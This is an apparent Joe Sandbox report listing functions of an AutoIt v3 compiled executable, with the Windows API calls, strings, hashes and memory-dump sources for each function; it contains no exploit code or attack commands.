Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 722fd9c4038c39b7639f282633079a88c9236416968013cec151995ef650dce0
Instruction ID: ed9dcc445fa37460c6b62a261be117fad699d1733e93a240b547b1f901ce9834
Opcode Fuzzy Hash: 722fd9c4038c39b7639f282633079a88c9236416968013cec151995ef650dce0
Instruction Fuzzy Hash: E821E670900319BFDF14DFA6EC55AAABFB4EB48B50F00451FE608B62A0D7B945498F90

Function 00E40FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000101,?), ref: 00E41019
inet_addr.WSOCK32(?), ref: 00E41079
gethostbyname.WS2_32(?), ref: 00E41085
IcmpCreateFile.IPHLPAPI ref: 00E41093
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00E41123
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00E41142
IcmpCloseHandle.IPHLPAPI(?), ref: 00E41216
WSACleanup.WSOCK32 ref: 00E4121C

Strings

Ping, xrefs: 00E410D3

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 62fa2b14b85e02e7643f573699a9d755f34cf4ba5992749e0263877a28555471
Instruction ID: 2d5c3a9d93df006994171d37c4ec77820b91df53bed1f40d6bdc51c146e7252e
Opcode Fuzzy Hash: 62fa2b14b85e02e7643f573699a9d755f34cf4ba5992749e0263877a28555471
Instruction Fuzzy Hash: 6591AD316092419FDB20DF15D888F16BBE0EF44318F1489A9E569EB7A2C730ED85CB91

Function 00DCF6D0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00E148C6
t5, xrefs: 00DCFBB1
t5, xrefs: 00DCF8E0
t5, xrefs: 00E1463C
t5, xrefs: 00DCF97E
t5, xrefs: 00E145E9

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.$t5$t5$t5$t5$t5
API String ID: 0-3061639177
Opcode ID: 71c593b6a42840d5556edb97e1ede46b42f8f483400a946ccbad340108f7108b
Instruction ID: 1e043eb2f65e3b29d09ca84e2f5b1b0fd411d8b97c301723224f397c469a266f
Opcode Fuzzy Hash: 71c593b6a42840d5556edb97e1ede46b42f8f483400a946ccbad340108f7108b
Instruction Fuzzy Hash: 34C25C71A002169FCB24DF58C880BEDB7B2FF48314F25816AE955AB391D775ED81CBA0

Function 00DD0340 Relevance: 15.2, APIs: 3, Strings: 5, Instructions: 1236COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00DD15F2

Strings

t5, xrefs: 00DD0A6A
t5, xrefs: 00E15FF9
t5, xrefs: 00DD06B7
t5, xrefs: 00E1604D
t5, xrefs: 00DD075B

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Init_thread_footer
String ID: t5$t5$t5$t5$t5
API String ID: 1385522511-3253990334
Opcode ID: 32f9425003ed615b7a813d99bf9a8194d5e85521be84966aff55fa03370075ef
Instruction ID: 93f37bc996c25b25c03bbbb7673019fd7b57101bb005e6d2b6095ab64a9d86d5
Opcode Fuzzy Hash: 32f9425003ed615b7a813d99bf9a8194d5e85521be84966aff55fa03370075ef
Instruction Fuzzy Hash: FEB26A74A08341DFCB24DF19C480B2ABBE1FB99304F18495EE9899B351D771ED85CBA2

Function 00DC2793 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 153
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00DC327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00DC32AF
Part of subcall function 00DC327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00DC32B7
Part of subcall function 00DC327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00DC32C2
Part of subcall function 00DC327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00DC32CD
Part of subcall function 00DC327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00DC32D5
Part of subcall function 00DC327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00DC32DD

Part of subcall function 00DC3205: RegisterWindowMessageW.USER32(00000004,?,00DC2964), ref: 00DC325D

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00DC2A0A
OleInitialize.OLE32 ref: 00DC2A28
CloseHandle.KERNEL32(00000000,00000000), ref: 00E03A0D

Strings

(&, xrefs: 00DC2932
$, xrefs: 00DC280A
0$, xrefs: 00DC2A2E
d(, xrefs: 00DC2964
4', xrefs: 00DC2948

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: (&$0$$4'$d($$
API String ID: 1986988660-3144845333
Opcode ID: 1bf953894ea514bfdabd0c357a3cc53c0045ef317698c34a4237e1e6b1820864
Instruction ID: a09144c2be85109bd2eefc68fe12748216cfa1fc989db49250ffc074fe24c862
Opcode Fuzzy Hash: 1bf953894ea514bfdabd0c357a3cc53c0045ef317698c34a4237e1e6b1820864
Instruction Fuzzy Hash: 3B71AFB0916201BF8F98DF6BAD666153AE0FB88300742952F9618F7262E770444DCFA6

Function 00DF90C5 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c99fdde934a4ed92359d9fd5f1ead1a4864920c9e59cd9e2e6574fcb25c14bc
Instruction ID: 9562ff1b230dc0c0551bb15170eab30020bdd451074f0a63556d367e8303b903
Opcode Fuzzy Hash: 9c99fdde934a4ed92359d9fd5f1ead1a4864920c9e59cd9e2e6574fcb25c14bc
Instruction Fuzzy Hash: 55C1E470E0424DAFCF11EFA9D851BBDBBB0AF19310F098099EA54A7392C7319946CB71

Function 00DC35B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00DC35E1
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00DC3602
ShowWindow.USER32(00000000,?,?,?,?,?,?,00DC3368,?), ref: 00DC3616
ShowWindow.USER32(00000000,?,?,?,?,?,?,00DC3368,?), ref: 00DC361F

Strings

AutoIt v3, xrefs: 00DC35D9, 00DC35DE, 00DC35DF
edit, xrefs: 00DC35FC

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 73c854eb2ed826e55fcb79f7f70e3866a05a1113ed7f258a11049aeb6855339e
Instruction ID: bd9822cdef9190c42c81262e43a4a8db7e1cbaa020b373dacbbeb76599bc436a
Opcode Fuzzy Hash: 73c854eb2ed826e55fcb79f7f70e3866a05a1113ed7f258a11049aeb6855339e
Instruction Fuzzy Hash: CFF03A706043967EEB3187236C08E7B2EBDD7CAF10B00041FBA04B7160D2A90889DAB0

Function 00DC61A9 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 122
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00E05287

Part of subcall function 00DC8577: _wcslen.LIBCMT ref: 00DC858A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00DC6299

Strings

\+, xrefs: 00E05295
Line %d: , xrefs: 00E05305
AutoIt - , xrefs: 00DC620D

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line %d: $AutoIt - $\+
API String ID: 2289894680-1638154863
Opcode ID: cfed29cdef4a9ed11ff99e512361234ba8d4c98efd12919a3b3e377585b768d8
Instruction ID: 3d32768a973605a30bc5eff889904320653071616a51ecbaefeec53fbf34c25d
Opcode Fuzzy Hash: cfed29cdef4a9ed11ff99e512361234ba8d4c98efd12919a3b3e377585b768d8
Instruction Fuzzy Hash: D5415171408306AAC711EB60DC45FDFB7A8EF44320F14462EF599A31A1DB74D649CBB6

Function 00DF8A2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNEL32(00000000,00000000,?,OV,00DF894C,?,00E89CE8,0000000C,00DF89AB,?,OV,?,00E0564F), ref: 00DF8A84
GetLastError.KERNEL32 ref: 00DF8A8E
__dosmaperr.LIBCMT ref: 00DF8AB9

Strings

OV, xrefs: 00DF8A30

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID: OV
API String ID: 2583163307-2262073888
Opcode ID: e14e8239117c0133db0a1b6653b4048e3a3ee5eca2aa864321086e57264197e6
Instruction ID: 998587a65d852979f6acce8c2ed7ee7a1171b1e4028008050458736895f7d8c9
Opcode Fuzzy Hash: e14e8239117c0133db0a1b6653b4048e3a3ee5eca2aa864321086e57264197e6
Instruction Fuzzy Hash: FB01E5326051685AC7246234BC4577E7745CB82738F2B815BFB149B1D2DF2089C065B2

Function 00DC58CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00DC58BE,SwapMouseButtons,00000004,?), ref: 00DC58EF
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00DC58BE,SwapMouseButtons,00000004,?), ref: 00DC5910
RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00DC58BE,SwapMouseButtons,00000004,?), ref: 00DC5932

Strings

Control Panel\Mouse, xrefs: 00DC58ED

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 6d9603f17f6f9483f259ffd4d97e58fa02c9fadf4ee68e94f8c97b00398ad64d
Instruction ID: 4c0bce850cefab910d81274150d67c54c213c4e02088da495a722ff47707536a
Opcode Fuzzy Hash: 6d9603f17f6f9483f259ffd4d97e58fa02c9fadf4ee68e94f8c97b00398ad64d
Instruction Fuzzy Hash: FC115A75510619FFDB218FA5EC80EAE77B9EF01760B104499E802E7214EA31AE859B60

Function 00DD2B20 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00DD3006

Strings

CALL, xrefs: 00DD2FD6
bn, xrefs: 00DD2B36, 00DD2E8D

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL$bn
API String ID: 1385522511-1920074456
Opcode ID: 8c7c816ba08805943febc75768c9a60e55f0a1b223ea64ced74281eeb164ca9f
Instruction ID: 5a677dd3d3d9a477388366727461e1853b22f7b0ac19842ed258d683e12a7008
Opcode Fuzzy Hash: 8c7c816ba08805943febc75768c9a60e55f0a1b223ea64ced74281eeb164ca9f
Instruction Fuzzy Hash: DC227A706083419FC714DF24C880A6ABBF1FF99314F18895EF4969B3A1D771E985CBA2

Function 00DC3A95 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00E0413B

Part of subcall function 00DC5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DC55D1,?,?,00E04B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00DC5871

Part of subcall function 00DC3A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00DC3A76

Strings

X, xrefs: 00E04109
`u, xrefs: 00E04134

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X$`u
API String ID: 779396738-2693526198
Opcode ID: 1048b54d5a5149892700a35f18a117965884524b17760cb8cebd10ab66cd1917
Instruction ID: f71078fed3d22db2366a719acfcd8d6e5b9f878f8d36b8d27f9eed8b792812a1
Opcode Fuzzy Hash: 1048b54d5a5149892700a35f18a117965884524b17760cb8cebd10ab66cd1917
Instruction Fuzzy Hash: 6D219F70A042589BDB01DF94C805BEE7BF8EF49304F00801DE549B7281DBB49A898FB1

Function 00DE014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00DE09D8

Part of subcall function 00DE3614: RaiseException.KERNEL32(?,?,?,00DE09FA,?,00000000,?,?,?,?,?,?,00DE09FA,00000000,00E89758,00000000), ref: 00DE3674

__CxxThrowException@8.LIBVCRUNTIME ref: 00DE09F5

Strings

Unknown exception, xrefs: 00DE0A02

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 378415238ddc6e7691f09267d95e6d57c7aaac2950259bd93cc1ee28e8a894bb
Instruction ID: be9d30b0e28724aafb9c345f23f1e3081941dc47fefb255e0b5dd66f31a85ce3
Opcode Fuzzy Hash: 378415238ddc6e7691f09267d95e6d57c7aaac2950259bd93cc1ee28e8a894bb
Instruction Fuzzy Hash: 7EF0683490038D77DB00BEB6EC469AE7B6C9E00350B584125B95CE6593FBB1E695CAF0

Function 00E489B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00E48D52
TerminateProcess.KERNEL32(00000000), ref: 00E48D59
FreeLibrary.KERNEL32(?,?,?,?), ref: 00E48F3A

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: dffb5e4a6ad95a9e36621a1a0a4d4b2b3fac32644a86af888f9e493ada4f2a3d
Instruction ID: 158111c6b462147ab09eb3dc744a2df82aaa91b94bae2d2f428a25d6621f9c2e
Opcode Fuzzy Hash: dffb5e4a6ad95a9e36621a1a0a4d4b2b3fac32644a86af888f9e493ada4f2a3d
Instruction Fuzzy Hash: DE128B71A083019FC724DF28C584B6ABBE5FF84318F14995DE889AB352CB71E945CB92

Function 00E49AF3 Relevance: 4.7, APIs: 3, Instructions: 233COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00E49B87
_strcat.LIBCMT ref: 00E49BC6
_wcslen.LIBCMT ref: 00E49C14

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: _wcslen$_strcat
String ID:
API String ID: 306214811-0
Opcode ID: 09528f49577062b9c849d145cdb31dd86d3140d731ec8c61185b786f60b8ff0a
Instruction ID: 84e92ca84476b2e3f6eebd21d980fd93c352752855d717199cc178e2aeef774d
Opcode Fuzzy Hash: 09528f49577062b9c849d145cdb31dd86d3140d731ec8c61185b786f60b8ff0a
Instruction Fuzzy Hash: 8EA13B31604505DFCB18DF18D5D1AAABBA1FF45314B6094ADE84AAF392DB31ED42CB90

Function 00DDFCAD Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00DC61A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00DC6299

KillTimer.USER32(?,00000001,?,?), ref: 00DDFD36
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DDFD45
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E1FE33

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: 0a8c94249644121cc02206ad268ab99ba8272e51c2228c809f1b156023db5c67
Instruction ID: 7f04bf816a6dfbb8e2cced8b693cd5a9dfb748df14a91d4b8e08aff538237157
Opcode Fuzzy Hash: 0a8c94249644121cc02206ad268ab99ba8272e51c2228c809f1b156023db5c67
Instruction Fuzzy Hash: 0A31A971904344AFDB32CF24D855BE7BBEC9B06308F04149ED6DA67242C7745AC5CB51

Function 00DF970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00DF97BA,FF8BC369,00000000,00000002,00000000), ref: 00DF9744
GetLastError.KERNEL32(?,00DF97BA,FF8BC369,00000000,00000002,00000000,?,00DF5ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00DE6F41), ref: 00DF974E
__dosmaperr.LIBCMT ref: 00DF9755

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 026108c469e8ee7377c2890562787f8482a83374c47e52185374869318af5ed3
Instruction ID: fb4156fbc80848268bbe6ba5e74b9c1d4b6ed1a74d2da1c6b192f45de1d8e498
Opcode Fuzzy Hash: 026108c469e8ee7377c2890562787f8482a83374c47e52185374869318af5ed3
Instruction Fuzzy Hash: 38014032A2461CAFCB15BF9ADC05D7E7719DB85330B394249F91197190EA30DD41CBB0

Function 00DC396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00DC3A3C

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

